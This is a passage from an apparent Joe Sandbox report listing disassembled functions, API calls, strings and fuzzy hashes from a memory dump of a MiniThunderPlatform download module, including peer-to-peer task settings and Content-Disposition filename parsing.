                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027750
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1002775F
                                                                                                                                                • Part of subcall function 10023953: __EH_prolog.LIBCMT ref: 10023958
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023971
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002397E
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002398B
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023998
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239A5
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239B1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$V12@$?assign@?$basic_string@$??1?$basic_string@$V12@@$??0?$basic_string@?find@?$basic_string@$V01@$??$?8?erase@?$basic_string@?rfind@?$basic_string@D@1@@std@@D@2@@0@H_prologV01@@V?$basic_string@
                                                                                                                                              • String ID: #$://
                                                                                                                                              • API String ID: 1144794548-4280483794
                                                                                                                                              • Opcode ID: 8eff994b0137b6245d4989833263e7c9535ff5d0f630b21f11d7cb90f3f3b7b0
                                                                                                                                              • Instruction ID: b13f25927831e8b592bc94901459d2555bbd38607076ff56ba7da95ba6f6acf6
                                                                                                                                              • Opcode Fuzzy Hash: 8eff994b0137b6245d4989833263e7c9535ff5d0f630b21f11d7cb90f3f3b7b0
                                                                                                                                              • Instruction Fuzzy Hash: 13D18475900229DFDB15CBA4DC8CBEDBB79FF69704F544188E40AA3291DB702A89CF61
                                                                                                                                              Function 100B5130 Relevance: 58.2, APIs: 24, Strings: 9, Instructions: 450COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100B5194
                                                                                                                                                • Part of subcall function 10014360: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,10118FC7), ref: 10014371
                                                                                                                                                • Part of subcall function 10014360: InterlockedIncrement.KERNEL32(10311E80), ref: 10014383
                                                                                                                                                • Part of subcall function 10014360: RtlInitializeCriticalSection.NTDLL(00000024), ref: 1001438D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 100B51BD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(main), ref: 100B5240
                                                                                                                                                • Part of subcall function 100AE270: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,00000000,1008E59F,?,000000FF,00000000), ref: 100AE281
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,000000FF,00000000), ref: 100B526D
                                                                                                                                                • Part of subcall function 100EA470: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(priority_ranges,0000007C,00000000,?,?,?,p2s_task_event_handler,?,?,?,?), ref: 100EA499
                                                                                                                                                • Part of subcall function 100EA470: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EA4BF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B52BC
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B52D0
                                                                                                                                              • RtlInitializeCriticalSection.NTDLL(000001D8), ref: 100B52E7
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(no_data_expiration_time), ref: 100B537D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(p2sp), ref: 100B5394
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B540F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B5421
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(enable_p2p), ref: 100B547B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(p2sp_task), ref: 100B5492
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000001), ref: 100B54C8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B54DA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(enable_filesize), ref: 100B54F5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(p2sp_task), ref: 100B550C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B557C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B558E
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100B5607
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,514A63AA,10241D09,000000FF,10023A01), ref: 1002778D
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002779E
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277AC
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277BA
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277C8
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277D9
                                                                                                                                                • Part of subcall function 10089D40: RtlEnterCriticalSection.NTDLL(?), ref: 10089D68
                                                                                                                                                • Part of subcall function 10089D40: RtlLeaveCriticalSection.NTDLL(?), ref: 10089D87
                                                                                                                                                • Part of subcall function 10089DA0: RtlEnterCriticalSection.NTDLL(?), ref: 10089DC8
                                                                                                                                                • Part of subcall function 10089DA0: RtlLeaveCriticalSection.NTDLL(?), ref: 10089DE7
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(member_stat_flag), ref: 100B57D0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(MemberStat), ref: 100B57E7
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000), ref: 1007DE38
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007DE62
                                                                                                                                                • Part of subcall function 1007DDC0: RtlInitializeCriticalSection.NTDLL(00000184), ref: 1007DE7F
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?), ref: 1007DF39
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1007DF71
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1007DF8A
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1007DFA3
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1007DFBC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B585B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B586D
                                                                                                                                                • Part of subcall function 10023953: __EH_prolog.LIBCMT ref: 10023958
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023971
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002397E
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002398B
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023998
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239A5
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239B1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@$CriticalSection$Initialize$EnterLeaveV01@@$CountH_prologIncrementInterlockedTickmalloc
                                                                                                                                              • String ID: MemberStat$enable_filesize$enable_p2p$main$member_stat_flag$no_data_expiration_time$p2s_task_event_handler$p2sp$p2sp_task
                                                                                                                                              • API String ID: 3320299575-963970474
                                                                                                                                              • Opcode ID: 18b95808ddf809d3aac59e5513448c20e7157fc99c79d85fb6eeed26475d5de7
                                                                                                                                              • Instruction ID: 042c997c1ccf093ac44b17af996850814bb3778ef32e95c9f3a22c521844d1f0
                                                                                                                                              • Opcode Fuzzy Hash: 18b95808ddf809d3aac59e5513448c20e7157fc99c79d85fb6eeed26475d5de7
                                                                                                                                              • Instruction Fuzzy Hash: AC2223741087849FD324CF29C898BDBFBE4FB99304F40495EE5AE83291DB74A548CB62
                                                                                                                                              Function 10095030 Relevance: 58.1, APIs: 28, Strings: 5, Instructions: 304COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Content-Disposition,00000000), ref: 10095089
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100950B5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(httpresponse_header don't have field: Content-Disposition,00000000), ref: 100950D7
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102BBD20), ref: 10095100
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000), ref: 10095110
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(filename=,00000000,00000009), ref: 10095140
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1009515B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@II@Z.MSVCP71(?,-00000009,?), ref: 10095180
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?), ref: 100951AB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,?,?), ref: 100951C3
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,00000001), ref: 100951FA
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,00000000,00000001), ref: 10095215
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,?), ref: 1009523B
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 10095284
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10095295
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?), ref: 100954AF
                                                                                                                                                • Part of subcall function 10093E70: ?find_first_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(1027B92C,00000000,00000002,00000000,1009519E,?), ref: 10093E80
                                                                                                                                                • Part of subcall function 10093E70: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(102768F0), ref: 10093E97
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,00000000,00000001,?), ref: 100952EF
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,?), ref: 10095311
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1009534B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009535C
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,?,?,?,?), ref: 100953D1
                                                                                                                                              • WideCharToMultiByte.KERNEL32 ref: 1009540A
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,00000000), ref: 10095424
                                                                                                                                              • ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(\/:*?"<>|,00000000,00000009,?,?,?,?), ref: 1009543A
                                                                                                                                              • ?_Xran@_String_base@std@@QBEXXZ.MSVCP71(?,?,?,?), ref: 10095462
                                                                                                                                              • ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(\/:*?"<>|,00000000,00000009,?,?,?,?), ref: 1009548F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100954CC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100954E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V12@$V01@@$?assign@?$basic_string@?erase@?$basic_string@?find@?$basic_string@$??$?8?find_first_of@?$basic_string@ByteCharD@1@@std@@MultiV01@V12@@V?$basic_string@Wide$??4?$basic_string@?find_first_not_of@?$basic_string@D@2@@0@D@2@@0@0@ExceptionString_base@std@@ThrowXran@_
                                                                                                                                              • String ID: ;$Content-Disposition$\/:*?"<>|$filename=$httpresponse_header don't have field: Content-Disposition
                                                                                                                                              • API String ID: 849614362-1980596132
                                                                                                                                              • Opcode ID: a0f2186e48e26a9537f3fbc2c2daafe0fd0948544094fbf78fa4e98a7ba052ab
                                                                                                                                              • Instruction ID: 838cc8897af6d576a4127fd8536d7ba645fea8e63dac7dca352d765134cec2a7
                                                                                                                                              • Opcode Fuzzy Hash: a0f2186e48e26a9537f3fbc2c2daafe0fd0948544094fbf78fa4e98a7ba052ab
                                                                                                                                              • Instruction Fuzzy Hash: C4D17E711083919FD734CB24C898FEAB7E9FB98705F008A1DF58E83291DB756948CB52
                                                                                                                                              Function 100C9386 Relevance: 56.3, APIs: 27, Strings: 5, Instructions: 291COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100C9416
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C9468
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100C946F
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C9476
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C948A
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100C949C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C94E9
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 100C94FE
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100C956F
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C95C2
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100C95C9
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C95D0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C95E3
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100C95F5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C962D
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 100C9642
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100C9689
                                                                                                                                                • Part of subcall function 1000F180: _ui64toa.MSVCR71 ref: 1000F1AC
                                                                                                                                                • Part of subcall function 1000F180: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,?,?,?,?,100162D1,?,?,?,?,00000014,env), ref: 1000F1BC
                                                                                                                                                • Part of subcall function 1007C7F0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,1007C745), ref: 1007C804
                                                                                                                                                • Part of subcall function 100019A2: __EH_prolog.LIBCMT ref: 100019A7
                                                                                                                                                • Part of subcall function 100019A2: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP71(?,00000000,?,7C3CC1BB,?,10277CA8), ref: 10001B0B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,00000000,?), ref: 100C971C
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100C9723
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C972A
                                                                                                                                                • Part of subcall function 100019A2: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP71(?,?,7C3CC1BB,?,10277CA8), ref: 10001A30
                                                                                                                                                • Part of subcall function 100019A2: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP71(?,?,7C3CC1BB,?,10277CA8), ref: 10001A6A
                                                                                                                                                • Part of subcall function 100019A2: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP71(?,?,7C3CC1BB,?,10277CA8), ref: 10001A9A
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C9739
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C9755
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C976A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C977F
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100C9791
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000002,00000000,?,?), ref: 100C97CA
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 100C97DF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
